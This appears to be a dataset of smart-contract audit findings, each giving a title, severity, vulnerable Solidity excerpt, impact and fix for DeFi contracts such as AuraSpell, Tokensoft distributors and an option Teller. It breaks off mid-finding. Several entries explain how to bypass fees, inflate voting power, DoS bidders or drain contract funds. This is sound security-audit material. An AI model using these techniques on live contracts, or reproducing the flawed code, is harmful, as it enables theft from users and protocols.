This causes loss to the user as too many fees are taken from them.чUse the same order as ConvexSpell and sell rewards BEFORE burning BLPчUser will lose funds due to incorrect feesч```\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n );\\n }\\n }\\n\\n /// 4. Swap each reward token for the debt token\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n address sellToken = rewardTokens[i];\\n if (sellToken == STASH_AURA) sellToken = AURA;\\n\\n _doCutRewardsFee(sellToken);\\n```\\n -Adversary can abuse hanging approvals left by PSwapLib.swap to bypass reward feesчmediumчAuraSpell.sol#L247-L257\\n```\\n _doCutRewardsFee(sellToken);\\n if (\\n expectedRewards[i] != 0 &&\\n !PSwapLib.swap(\\n augustusSwapper,\\n tokenTransferProxy,\\n sellToken,\\n expectedRewards[i],\\n swapDatas[i]\\n )\\n ) revert Errors.SWAP_FAILED(sellToken);\\n```\\n\\nAuraSpell#closePositionFarm allows the user to specify any expectedRewards they wish. This allows the user to approve any amount, even if the amount is much larger than they would otherwise use. The can abuse these hanging approvals to swap tokens out of order and avoid paying reward fees.\\nExample: Assume there are two rewards, token A and token B. Over time a user's position accumulates 100 rewards for each token. Normally the user would have to pay fees on those rewards. However they can bypass it by first creating hanging approvals. The user would start by redeeming a very small amount of LP and setting expectedRewards to uint256.max. They wouldn't sell the small amount leaving a very large approval left for both tokens. Now the user withdraws the rest of their position. This time they specify the swap data to swap token B first. 
The user still has to pay fees on token A but now they have traded token B before any fees can be taken on it.чAfter the swap reset allowances to 0чUser can bypass reward feesч```\\n _doCutRewardsFee(sellToken);\\n if (\\n expectedRewards[i] != 0 &&\\n !PSwapLib.swap(\\n augustusSwapper,\\n tokenTransferProxy,\\n sellToken,\\n expectedRewards[i],\\n swapDatas[i]\\n )\\n ) revert Errors.SWAP_FAILED(sellToken);\\n```\\n -ConvexSpell is completely broken for any curve LP that utilizes native ETHчmediumчConvexSpell.sol#L120-L127\\n```\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i; i != 2; ++i) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n```\\n\\nConvexSpell#openPositionFarm attempts to call balanceOf on each component of the LP. Since native ETH uses the `0xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee` this call will always revert. This breaks compatibility with EVERY curve pool that uses native ETH which make most of the highest volume pools on the platfrom.чI would recommend conversion between native ETH and wETH to prevent this issue.чConvexSpell is completely incompatible with a majority of Curve poolsч```\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i; i != 2; ++i) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n```\\n -WAuraPools doesn't correctly account for AuraStash causing all deposits to be permanently lostчmediumчWAuraPools.sol#L413-L418\\n```\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n```\\n\\nWhen burning the wrapped LP token, it attempts to transfer each token to msg.sender. 
The problem is that stash AURA cannot be transferred like a regular ERC20 token and any transfers will revert. Since this will be called on every attempted withdraw, all deposits will be permanently unrecoverable.чCheck if reward is stash AURA and send regular AURA instead similar to what is done in AuraSpell.чAll deposits will be permanently unrecoverableч```\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n```\\n -AuraSpell `openPositionFarm` will revert when the tokens contains `lpToken`чmediumчIn AuraSpell, the `openPositionFarm` will call `joinPool` in Balancer's vault. But when analyzing the `JoinPoolRequest` struct, we see an issue on `maxAmountsIn` and `amountsIn` which can be of different lengths, thus this will be reverted since in Balancer's vault, these two arrays should be the same length.\\n```\\nFile: AuraSpell.sol\\n function openPositionFarm(\\n OpenPosParam calldata param,\\n uint256 minimumBPT\\n )\\n// rest of code\\n {\\n// rest of code\\n /// 3. 
Add liquidity to the Balancer pool and receive BPT in return.\\n {\\n// rest of code\\n if (poolAmountOut != 0) {\\n vault.joinPool(\\n wAuraPools.getBPTPoolId(lpToken),\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest({\\n assets: tokens,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, amountsIn, _minimumBPT),\\n fromInternalBalance: false\\n })\\n );\\n }\\n }\\n// rest of code\\n }\\n// rest of code\\n function _getJoinPoolParamsAndApprove(\\n address vault,\\n address[] memory tokens,\\n uint256[] memory balances,\\n address lpToken\\n ) internal returns (uint256[] memory, uint256[] memory, uint256) {\\n// rest of code\\n uint256 length = tokens.length;\\n uint256[] memory maxAmountsIn = new uint256[](length);\\n uint256[] memory amountsIn = new uint256[](length);\\n bool isLPIncluded;\\n for (i; i != length; ) {\\n if (tokens[i] != lpToken) {\\n amountsIn[j] = IERC20(tokens[i]).balanceOf(address(this));\\n if (amountsIn[j] > 0) {\\n _ensureApprove(tokens[i], vault, amountsIn[j]);\\n }\\n ++j;\\n } else isLPIncluded = true;\\n maxAmountsIn[i] = IERC20(tokens[i]).balanceOf(address(this));\\n unchecked {\\n ++i;\\n }\\n }\\n if (isLPIncluded) {\\n assembly {\\n mstore(amountsIn, sub(mload(amountsIn), 1))\\n }\\n }\\n// rest of code\\n return (maxAmountsIn, amountsIn, poolAmountOut);\\n }\\n```\\n\\nthese `maxAmountsIn` and `amountsIn` are coming from `_getJoinPoolParamsAndApprove`. And by seeing the function, we can see that there is possible issue when the `tokens[i] == lpToken`.\\nWhen `tokens[i] == lpToken`, the flag `isLPIncluded` will be true. And will enter this block,\\n```\\n if (isLPIncluded) {\\n assembly {\\n mstore(amountsIn, sub(mload(amountsIn), 1))\\n }\\n }\\n```\\n\\nthis will decrease the `amountsIn` length. 
Thus, `amountsIn` and `maxAmountsIn` will be in different length.\\nIn Balancer's `JoinPoolRequest` struct, the `maxAmountsIn`, and `userData` second decoded bytes (amountsIn) should be the same array length, because it will be checked in Balancer.\\n```\\n IBalancerVault.JoinPoolRequest({\\n assets: tokens,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, amountsIn, _minimumBPT),\\n fromInternalBalance: false\\n })\\n```\\n\\nTherefore, in this situation, it will be reverted.чIssue AuraSpell `openPositionFarm` will revert when the tokens contains `lpToken`\\nRemove the assembly code where it will decrease the `amountsIn` length when `isLPIncluded` is true to make sure the array length are same.чUser can't open position on AuraSpell when `tokens` contains `lpToken`ч```\\nFile: AuraSpell.sol\\n function openPositionFarm(\\n OpenPosParam calldata param,\\n uint256 minimumBPT\\n )\\n// rest of code\\n {\\n// rest of code\\n /// 3. Add liquidity to the Balancer pool and receive BPT in return.\\n {\\n// rest of code\\n if (poolAmountOut != 0) {\\n vault.joinPool(\\n wAuraPools.getBPTPoolId(lpToken),\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest({\\n assets: tokens,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, amountsIn, _minimumBPT),\\n fromInternalBalance: false\\n })\\n );\\n }\\n }\\n// rest of code\\n }\\n// rest of code\\n function _getJoinPoolParamsAndApprove(\\n address vault,\\n address[] memory tokens,\\n uint256[] memory balances,\\n address lpToken\\n ) internal returns (uint256[] memory, uint256[] memory, uint256) {\\n// rest of code\\n uint256 length = tokens.length;\\n uint256[] memory maxAmountsIn = new uint256[](length);\\n uint256[] memory amountsIn = new uint256[](length);\\n bool isLPIncluded;\\n for (i; i != length; ) {\\n if (tokens[i] != lpToken) {\\n amountsIn[j] = IERC20(tokens[i]).balanceOf(address(this));\\n if (amountsIn[j] > 0) {\\n _ensureApprove(tokens[i], vault, amountsIn[j]);\\n }\\n ++j;\\n } 
else isLPIncluded = true;\\n maxAmountsIn[i] = IERC20(tokens[i]).balanceOf(address(this));\\n unchecked {\\n ++i;\\n }\\n }\\n if (isLPIncluded) {\\n assembly {\\n mstore(amountsIn, sub(mload(amountsIn), 1))\\n }\\n }\\n// rest of code\\n return (maxAmountsIn, amountsIn, poolAmountOut);\\n }\\n```\\n -\"Votes\" balance can be increased indefinitely in multiple contractsчhighчThe \"voting power\" can be easily manipulated in the following contracts:\\n`ContinuousVestingMerkle`\\n`PriceTierVestingMerkle`\\n`PriceTierVestingSale_2_0`\\n`TrancheVestingMerkle`\\n`CrosschainMerkleDistributor`\\n`CrosschainContinuousVestingMerkle`\\n`CrosschainTrancheVestingMerkle`\\nAll the contracts inheriting from the contracts listed above\\nThis is caused by the public `initializeDistributionRecord()` function that can be recalled multiple times without any kind of access control:\\n```\\n function initializeDistributionRecord(\\n uint32 _domain, // the domain of the beneficiary\\n address _beneficiary, // the address that will receive tokens\\n uint256 _amount, // the total claimable by this beneficiary\\n bytes32[] calldata merkleProof\\n ) external validMerkleProof(_getLeaf(_beneficiary, _amount, _domain), merkleProof) {\\n _initializeDistributionRecord(_beneficiary, _amount);\\n }\\n```\\n\\nThe `AdvancedDistributor` abstract contract which inherits from the `ERC20Votes`, `ERC20Permit` and `ERC20` contracts, distributes tokens to beneficiaries with voting-while-vesting and administrative controls. Basically, before the tokens are vested/claimed by a certain group of users, these users can use these `ERC20` tokens to vote. 
These tokens are minted through the `_initializeDistributionRecord()` function:\\n```\\n function _initializeDistributionRecord(\\n address beneficiary,\\n uint256 totalAmount\\n ) internal virtual override {\\n super._initializeDistributionRecord(beneficiary, totalAmount);\\n\\n // add voting power through ERC20Votes extension\\n _mint(beneficiary, tokensToVotes(totalAmount));\\n }\\n```\\n\\nAs mentioned in the Tokensoft Discord channel these ERC20 tokens minted are used to track an address's unvested token balance, so that other projects can utilize 'voting while vesting'.\\nA user can simply call as many times as he wishes the `initializeDistributionRecord()` function with a valid merkle proof. With each call, the `totalAmount` of tokens will be minted. Then, the user simply can call `delegate()` and delegate those votes to himself, \"recording\" the inflated voting power.чOnly allow users to call once the `initializeDistributionRecord()` function. Consider using a mapping to store if the function was called previously or not. Keep also in mind that fully vested and claimed users should not be able to call this function and if they do, the total amount of tokens that should be minted should be 0 or proportional/related to the amount of tokens that they have already claimed.чThe issue totally breaks the 'voting while vesting' design. 
Any DAO/project using these contracts to determine their voting power could be easily manipulated/exploited.ч```\\n function initializeDistributionRecord(\\n uint32 _domain, // the domain of the beneficiary\\n address _beneficiary, // the address that will receive tokens\\n uint256 _amount, // the total claimable by this beneficiary\\n bytes32[] calldata merkleProof\\n ) external validMerkleProof(_getLeaf(_beneficiary, _amount, _domain), merkleProof) {\\n _initializeDistributionRecord(_beneficiary, _amount);\\n }\\n```\\n -`SafeERC20.safeApprove` reverts for changing existing approvalsчmediumч`SafeERC20.safeApprove` reverts when a non-zero approval is changed to a non-zero approval. The `CrosschainDistributor._setTotal` function tries to change an existing approval to a non-zero value which will revert.\\nThe safeApprove function has explicit warning:\\n```\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n```\\n\\nBut still the `_setTotal` use it to change approval amount:\\n```\\n function _allowConnext(uint256 amount) internal {\\n token.safeApprove(address(connext), amount);\\n }\\n\\n /** Reset Connext allowance when total is updated */\\n function _setTotal(uint256 _total) internal virtual override onlyOwner {\\n super._setTotal(_total);\\n _allowConnext(total - claimed);\\n }\\n```\\nчConsider using 'safeIncreaseAllowance' and 'safeDecreaseAllowance' instead of `safeApprove` in `_setTotal`.чDue to this bug all calls to `setTotal` function of `CrosschainContinuousVestingMerkle` and `CrosschainTrancheVestingMerkle` will get reverted.\\nTokensoft airdrop protocol is meant to be used by other protocols and the ability to change `total` parameter is an intended offering. This feature will be important for those external protocols due to the different nature & requirement of every airdrop. 
But this feature will not be usable by airdrop owners due to the incorrect code implementation.ч```\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n```\\n -CrosschainDistributor: Not paying relayer fee when calling xcall to claim tokens to other domainsчmediumчCrosschainDistributor is not paying relayer fee when calling xcall to claim tokens to other domains. The transaction will not be relayed on target chain to finalize the claim. User will not receive the claimed tokens unless they bump the transaction fee themselves.\\nIn `_settleClaim`, the CrosschainDistributor is using xcall to claim tokens to another domain. But relayer fee is not paid.\\n```\\n id = connext.xcall( // <------ relayer fee should be paid here\\n _recipientDomain, // destination domain\\n _recipient, // to\\n address(token), // asset\\n _recipient, // delegate, only required for self-execution + slippage\\n _amount, // amount\\n 0, // slippage -- assumes no pools on connext\\n bytes('') // calldata\\n );\\n```\\n\\nWithout the relayer fee, the transaction will not be relayed. 
The user will need to bump the relayer fee to finally settle the claim by following the instructions here in the connext doc.чHelp user bump the transaction fee in Satellite.чUser will not receive their claimed tokens on target chain.ч```\\n id = connext.xcall( // <------ relayer fee should be paid here\\n _recipientDomain, // destination domain\\n _recipient, // to\\n address(token), // asset\\n _recipient, // delegate, only required for self-execution + slippage\\n _amount, // amount\\n 0, // slippage -- assumes no pools on connext\\n bytes('') // calldata\\n );\\n```\\n -Loss of funds during user adjustingчmediumчAdjusting a user's total claimable value not working correctly\\nWhenever the owner is adjusting user's total claimable value, the `records[beneficiary].total` is decreased or increased by `uint256 diff = uint256(amount > 0 ? amount : -amount);`.\\nHowever some assumptions made are not correct. Scenario:\\nUser has bought 200 FOO tokens for example.\\nIn `PriceTierVestingSale_2_0.sol` he calls the `initializeDistributionRecord` which sets his `records[beneficiary].total` to the purchased amount || 200. So `records[beneficiary].total` = 200\\nAfter that the owner decides to adjust his `records[beneficiary].total` to 300. So `records[beneficiary].total` = 300\\nUser decides to `claim` his claimable amount which should be equal to 300. 
He calls the `claim` function in `PriceTierVestingSale_2_0.sol`.\\n```\\nfunction claim(\\n address beneficiary // the address that will receive tokens\\n ) external validSaleParticipant(beneficiary) nonReentrant {\\n uint256 claimableAmount = getClaimableAmount(beneficiary);\\n uint256 purchasedAmount = getPurchasedAmount(beneficiary);\\n\\n // effects\\n uint256 claimedAmount = super._executeClaim(beneficiary, purchasedAmount);\\n\\n // interactions\\n super._settleClaim(beneficiary, claimedAmount);\\n }\\n```\\n\\nAs we can see here the `_executeClaim` is called with the `purchasedAmount` of the user which is still 200.\\n```\\nfunction _executeClaim(\\n address beneficiary,\\n uint256 _totalAmount\\n ) internal virtual returns (uint256) {\\n uint120 totalAmount = uint120(_totalAmount);\\n\\n // effects\\n if (records[beneficiary].total != totalAmount) {\\n // re-initialize if the total has been updated\\n _initializeDistributionRecord(beneficiary, totalAmount);\\n }\\n \\n uint120 claimableAmount = uint120(getClaimableAmount(beneficiary));\\n require(claimableAmount > 0, 'Distributor: no more tokens claimable right now');\\n\\n records[beneficiary].claimed += claimableAmount;\\n claimed += claimableAmount;\\n\\n return claimableAmount;\\n }\\n```\\n\\nNow check the `if` statement:\\n```\\n if (records[beneficiary].total != totalAmount) {\\n // re-initialize if the total has been updated\\n _initializeDistributionRecord(beneficiary, totalAmount);\\n }\\n```\\n\\nThe point of this is if the `total` of the user has been adjusted, to re-initialize to the corresponding amount, but since it's updated by the input value which is 200, records[beneficiary].total = 200 , the user will lose the 100 added from the owner during the `adjust`чI am not sure if it is enough to just set it the following way:\\n```\\n if (records[beneficiary].total != totalAmount) {\\n // re-initialize if the total has been updated\\n `--` _initializeDistributionRecord(beneficiary, 
totalAmount);\\n `++` _initializeDistributionRecord(beneficiary, records[beneficiary].total);\\n }\\n```\\n\\nThink of different scenarios if it is done that way and also keep in mind that the same holds for the decrease of `records[beneficiary].total` by `adjust`чLoss of funds for the user and the protocolч```\\nfunction claim(\\n address beneficiary // the address that will receive tokens\\n ) external validSaleParticipant(beneficiary) nonReentrant {\\n uint256 claimableAmount = getClaimableAmount(beneficiary);\\n uint256 purchasedAmount = getPurchasedAmount(beneficiary);\\n\\n // effects\\n uint256 claimedAmount = super._executeClaim(beneficiary, purchasedAmount);\\n\\n // interactions\\n super._settleClaim(beneficiary, claimedAmount);\\n }\\n```\\n -Exponential and logarithmic price adapters will return incorrect pricing when moving from higher dp token to lower dp tokenчmediumчThe exponential and logarithmic price adapters do not work correctly when used with token pricing of different decimal places. This is because the resolution of the underlying expWad and lnWad functions is not fit for tokens that aren't 18 dp.\\nAuctionRebalanceModuleV1.sol#L856-L858\\n```\\nfunction _calculateQuoteAssetQuantity(bool isSellAuction, uint256 _componentQuantity, uint256 _componentPrice) private pure returns (uint256) {\\n return isSellAuction ? _componentQuantity.preciseMulCeil(_componentPrice) : _componentQuantity.preciseMul(_componentPrice);\\n}\\n```\\n\\nThe price returned by the adapter is used directly to call _calculateQuoteAssetQuantity which uses preciseMul/preciseMulCeil to convert from component amount to quote amount. Assume we wish to sell 1 WETH for 2,000 USDT. 
WETH is 18dp while USDT is 6dp giving us the following price:\\n```\\n1e18 * price / 1e18 = 2000e6\\n```\\n\\nSolving for price gives:\\n```\\nprice = 2000e6\\n```\\n\\nThis establishes that the price must be scaled to:\\n```\\nprice dp = 18 - component dp + quote dp\\n```\\n\\nPlugging in our values we see that our scaling of 6 dp makes sense.\\nBoundedStepwiseExponentialPriceAdapter.sol#L67-L80\\n```\\n uint256 expExpression = uint256(FixedPointMathLib.expWad(expArgument));\\n\\n // Protect against priceChange overflow\\n if (scalingFactor > type(uint256).max / expExpression) {\\n return _getBoundaryPrice(isDecreasing, maxPrice, minPrice);\\n }\\n uint256 priceChange = scalingFactor * expExpression - WAD;\\n\\n if (isDecreasing) {\\n // Protect against price underflow\\n if (priceChange > initialPrice) {\\n return minPrice;\\n }\\n return FixedPointMathLib.max(initialPrice - priceChange , minPrice);\\n```\\n\\nGiven the pricing code and notably the simple scalingFactor it also means that priceChange must be in the same order of magnitude as the price which in this case is 6 dp. The issue is that on such small scales, both lnWad and expWad do not behave as expected and instead yield a linear behavior. This is problematic as the curve will produce unexpected behaviors under these circumstances selling the tokens at the wrong price. Since both functions are written in assembly it is very difficult to determine exactly what is going on or why this occurs but testing in remix gives the following values:\\n```\\nexpWad(1e6) - WAD = 1e6\\nexpWad(5e6) - WAD = 5e6\\nexpWad(10e6) - WAD = 10e6\\nexpWad(1000e6) - WAD = 1000e6\\n```\\n\\nAs seen above these value create a perfect linear scaling and don't exhibit any exponential qualities. Given the range of this linearity it means that these adapters can never work when selling from higher to lower dp tokens.чscalingFactor should be scaled to 18 dp then applied via preciseMul instead of simple multiplication. 
This allows lnWad and expWad to execute in 18 dp then be scaled down to the correct dp.чExponential and logarithmic pricing is wrong when tokens have mismatched dpч```\\nfunction _calculateQuoteAssetQuantity(bool isSellAuction, uint256 _componentQuantity, uint256 _componentPrice) private pure returns (uint256) {\\n return isSellAuction ? _componentQuantity.preciseMulCeil(_componentPrice) : _componentQuantity.preciseMul(_componentPrice);\\n}\\n```\\n -SetToken can't be unlocked early.чmediumчSetToken can't be unlocked early\\nThe function unlock() is used to unlock the setToken after rebalancing, as how it is right now there are two ways to unlock the setToken.\\ncan be unlocked once the rebalance duration has elapsed\\ncan be unlocked early if all targets are met, there is excess or at-target quote asset, and raiseTargetPercentage is zero\\n```\\n function unlock(ISetToken _setToken) external {\\n bool isRebalanceDurationElapsed = _isRebalanceDurationElapsed(_setToken);\\n bool canUnlockEarly = _canUnlockEarly(_setToken);\\n\\n // Ensure that either the rebalance duration has elapsed or the conditions for early unlock are met\\n require(isRebalanceDurationElapsed || canUnlockEarly, \"Cannot unlock early unless all targets are met and raiseTargetPercentage is zero\");\\n\\n // If unlocking early, update the state\\n if (canUnlockEarly) {\\n delete rebalanceInfo[_setToken].rebalanceDuration;\\n emit LockedRebalanceEndedEarly(_setToken);\\n }\\n\\n // Unlock the SetToken\\n _setToken.unlock();\\n }\\n```\\n\\n```\\n function _canUnlockEarly(ISetToken _setToken) internal view returns (bool) {\\n RebalanceInfo storage rebalance = rebalanceInfo[_setToken];\\n return _allTargetsMet(_setToken) && _isQuoteAssetExcessOrAtTarget(_setToken) && rebalance.raiseTargetPercentage == 0;\\n }\\n```\\n\\nThe main problem occurs as the value of raiseTargetPercentage isn't reset after rebalancing. 
The other thing is that the function setRaiseTargetPercentage can't be used to fix this issue as it doesn't allow giving raiseTargetPercentage a zero value.\\nA setToken can use the AuctionModule to rebalance multiple times, duo to the fact that raiseTargetPercentage value isn't reset after every rebalancing. Once changed with the help of the function setRaiseTargetPercentage this value will only be non zero for every next rebalancing. A setToken can be unlocked early only if all other requirements are met and the raiseTargetPercentage equals zero.\\nThis problem prevents for a setToken to be unlocked early on the next rebalances, once the value of the variable raiseTargetPercentage is set to non zero.\\nOn every rebalance a manager should be able to keep the value of raiseTargetPercentage to zero (so the setToken can be unlocked early), or increase it at any time with the function setRaiseTargetPercentage.\\n```\\n function setRaiseTargetPercentage(\\n ISetToken _setToken,\\n uint256 _raiseTargetPercentage\\n )\\n external\\n onlyManagerAndValidSet(_setToken)\\n {\\n // Ensure the raise target percentage is greater than 0\\n require(_raiseTargetPercentage > 0, \"Target percentage must be greater than 0\");\\n\\n // Update the raise target percentage in the RebalanceInfo struct\\n rebalanceInfo[_setToken].raiseTargetPercentage = _raiseTargetPercentage;\\n\\n // Emit an event to log the updated raise target percentage\\n emit RaiseTargetPercentageUpdated(_setToken, _raiseTargetPercentage);\\n }\\n```\\nчRecommend to reset the value raiseTargetPercentage after every rebalancing.\\n```\\n function unlock(ISetToken _setToken) external {\\n bool isRebalanceDurationElapsed = _isRebalanceDurationElapsed(_setToken);\\n bool canUnlockEarly = _canUnlockEarly(_setToken);\\n\\n // Ensure that either the rebalance duration has elapsed or the conditions for early unlock are met\\n require(isRebalanceDurationElapsed || canUnlockEarly, \"Cannot unlock early unless all targets are 
met and raiseTargetPercentage is zero\");\\n\\n // If unlocking early, update the state\\n if (canUnlockEarly) {\\n delete rebalanceInfo[_setToken].rebalanceDuration;\\n emit LockedRebalanceEndedEarly(_setToken);\\n }\\n\\n+ rebalanceInfo[_setToken].raiseTargetPercentage = 0;\\n\\n // Unlock the SetToken\\n _setToken.unlock();\\n }\\n```\\nчOnce the value of raiseTargetPercentage is set to non zero, every next rebalancing of the setToken won't be eligible for unlocking early. As the value of raiseTargetPercentage isn't reset after every rebalance and neither the manager can set it back to zero with the function setRaiseTargetPercentage().ч```\\n function unlock(ISetToken _setToken) external {\\n bool isRebalanceDurationElapsed = _isRebalanceDurationElapsed(_setToken);\\n bool canUnlockEarly = _canUnlockEarly(_setToken);\\n\\n // Ensure that either the rebalance duration has elapsed or the conditions for early unlock are met\\n require(isRebalanceDurationElapsed || canUnlockEarly, \"Cannot unlock early unless all targets are met and raiseTargetPercentage is zero\");\\n\\n // If unlocking early, update the state\\n if (canUnlockEarly) {\\n delete rebalanceInfo[_setToken].rebalanceDuration;\\n emit LockedRebalanceEndedEarly(_setToken);\\n }\\n\\n // Unlock the SetToken\\n _setToken.unlock();\\n }\\n```\\n -price is calculated wrongly in BoundedStepwiseExponentialPriceAdapterчmediumчThe BoundedStepwiseExponentialPriceAdapter contract is trying to implement price change as `scalingFactor * (e^x - 1)` but the code implements `scalingFactor * e^x - 1`. Since there are no brackets, multiplication would be executed before subtraction. 
And this has been confirmed with one of the team members.\\nThe getPrice code has been simplified as the following when boundary/edge cases are ignored\\n```\\n(\\n uint256 initialPrice,\\n uint256 scalingFactor,\\n uint256 timeCoefficient,\\n uint256 bucketSize,\\n bool isDecreasing,\\n uint256 maxPrice,\\n uint256 minPrice\\n) = getDecodedData(_priceAdapterConfigData);\\n\\nuint256 timeBucket = _timeElapsed / bucketSize;\\n\\nint256 expArgument = int256(timeCoefficient * timeBucket);\\n\\nuint256 expExpression = uint256(FixedPointMathLib.expWad(expArgument));\\n\\nuint256 priceChange = scalingFactor * expExpression - WAD;\\n```\\n\\nWhen timeBucket is 0, we want priceChange to be 0, so that the returned price would be the initial price. Since `e^0 = 1`, we need to subtract 1 (in WAD) from the `expExpression`.\\nHowever, with the incorrect implementation, the returned price would be different than real price by a value equal to `scalingFactor - 1`. The image below shows the difference between the right and wrong formula when initialPrice is 100 and scalingFactor is 11. 
The right formula starts at 100 while the wrong one starts at 110=100+11-1\\nчChange the following line\\n```\\n- uint256 priceChange = scalingFactor * expExpression - WAD;\\n+ uint256 priceChange = scalingFactor * (expExpression - WAD);\\n```\\nчIncorrect price is returned from BoundedStepwiseExponentialPriceAdapter and that will have devastating effects on rebalance.ч```\\n(\\n uint256 initialPrice,\\n uint256 scalingFactor,\\n uint256 timeCoefficient,\\n uint256 bucketSize,\\n bool isDecreasing,\\n uint256 maxPrice,\\n uint256 minPrice\\n) = getDecodedData(_priceAdapterConfigData);\\n\\nuint256 timeBucket = _timeElapsed / bucketSize;\\n\\nint256 expArgument = int256(timeCoefficient * timeBucket);\\n\\nuint256 expExpression = uint256(FixedPointMathLib.expWad(expArgument));\\n\\nuint256 priceChange = scalingFactor * expExpression - WAD;\\n```\\n -Full inventory asset purchases can be DOS'd via frontrunningчmediumчUsers who attempt to swap the entire component value can be frontrun with a very small bid making their transaction revert\\nAuctionRebalanceModuleV1.sol#L795-L796\\n```\\n // Ensure that the component quantity in the bid does not exceed the available auction quantity.\\n require(_componentQuantity <= bidInfo.auctionQuantity, \"Bid size exceeds auction quantity\");\\n```\\n\\nWhen creating a bid, it enforces the above requirement. This prevents users from buying more than they should but it is also a source of an easy DOS attack. Assume a user is trying to buy the entire balance of a component, a malicious user can frontrun them buying only a tiny amount. Since they requested the entire balance, the call with fail. 
This is a useful technique if an attacker wants to DOS other buyers to pass the time and get a better price from the dutch auction.чAllow users to specify type(uint256.max) to swap the entire available balanceчMalicious user can DOS legitimate users attempting to purchase the entire amount of componentч```\n // Ensure that the component quantity in the bid does not exceed the available auction quantity.\n require(_componentQuantity <= bidInfo.auctionQuantity, "Bid size exceeds auction quantity");\n```\n -All fund from Teller contract can be drained because a malicious receiver can call reclaim repeatedlyчhighчAll fund from Teller contract can be drained because a malicious receiver can call reclaim repeatedly\nWhen minting an option token, the user is required to transfer the payout token for a call option or quote token for a put option\nafter the expiration, the receiver can call reclaim to claim the payout token if the option type is call or claim the quote token if the option type is put\nhowever, the root cause is that when reclaiming the token, the corresponding option is not burnt (code)\n```\n // Revert if caller is not receiver\n if (msg.sender != receiver) revert Teller_NotAuthorized();\n\n // Transfer remaining collateral to receiver\n uint256 amount = optionToken.totalSupply();\n if (call) {\n payoutToken.safeTransfer(receiver, amount);\n } else {\n // Calculate amount of quote tokens equivalent to amount at strike price\n uint256 quoteAmount = amount.mulDiv(strikePrice, 10 ** payoutToken.decimals());\n quoteToken.safeTransfer(receiver, quoteAmount);\n }\n```\n\nthe Teller contract is likely to hold funds from multiple option tokens\na malicious actor can call Teller#deploy and set a receiver address that he controls\nand then wait for the option expiry and repeatedly call reclaim to steal the funds from the Teller contractчBurn the corresponding option token when reclaiming the fundчAll fund from Teller contract can be 
drained because a malicious receiver can call reclaim repeatedlyч```\\n // Revert if caller is not receiver\\n if (msg.sender != receiver) revert Teller_NotAuthorized();\\n\\n // Transfer remaining collateral to receiver\\n uint256 amount = optionToken.totalSupply();\\n if (call) {\\n payoutToken.safeTransfer(receiver, amount);\\n } else {\\n // Calculate amount of quote tokens equivalent to amount at strike price\\n uint256 quoteAmount = amount.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n quoteToken.safeTransfer(receiver, quoteAmount);\\n }\\n```\\n -All funds can be stolen from FixedStrikeOptionTeller using a token with malicious decimalsчhighч`FixedStrikeOptionTeller` is a single contract which deploys multiple option tokens. Hence this single contract holds significant payout/quote tokens as collateral. Also the `deploy`, `create` & `exercise` functions of this contract can be called by anyone.\\nThis mechanism can be exploited to drain `FixedStrikeOptionTeller` of all tokens.\\nThis is how the create functions looks like:\\n```\\n function create(\\n FixedStrikeOptionToken optionToken_,\\n uint256 amount_\\n ) external override nonReentrant {\\n // rest of code\\n if (call) {\\n // rest of code\\n } else {\\n uint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n // rest of code\\n quoteToken.safeTransferFrom(msg.sender, address(this), quoteAmount);\\n // rest of code\\n }\\n\\n optionToken.mint(msg.sender, amount_);\\n }\\n```\\n\\nexercise function:\\n```\\n function exercise(\\n FixedStrikeOptionToken optionToken_,\\n uint256 amount_\\n ) external override nonReentrant {\\n // rest of code\\n uint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n\\n if (msg.sender != receiver) {\\n // rest of code\\n }\\n\\n optionToken.burn(msg.sender, amount_);\\n\\n if (call) {\\n // rest of code\\n } else {\\n quoteToken.safeTransfer(msg.sender, quoteAmount);\\n }\\n }\\n```\\n\\nConsider this attack 
